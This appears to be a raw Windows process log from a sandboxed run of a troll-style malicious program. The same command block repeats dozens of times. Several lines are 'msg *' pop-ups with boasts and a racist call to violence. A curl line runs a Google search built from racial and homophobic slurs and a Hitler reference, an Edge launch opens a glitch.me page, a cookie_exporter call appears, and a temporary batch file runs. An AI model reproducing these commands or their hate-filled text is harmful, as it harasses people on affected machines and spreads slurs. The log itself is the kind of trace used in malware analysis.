"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6612,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6616,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=6704 /prefetch:14
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7116,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7148,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7344 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7492,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7652,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8316,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8332 /prefetch:14
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1128
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8400,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8392 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7684,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8712 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8712 /prefetch:14
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=8840,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=8824 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9016,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9060 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9232 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9380,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9408 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=9884,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9912 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10220,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9920 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10560,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=10612 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10836,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=10868 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=11008,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11044 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11228,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11208 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11404,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11016 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11568,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11600 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11808,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11752 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=11844,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11996 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=12252,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12232 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=12428,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12280 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12596,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12584 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12788,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12768 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp67FC.tmp.bat""
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12964,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12992 /prefetch:1
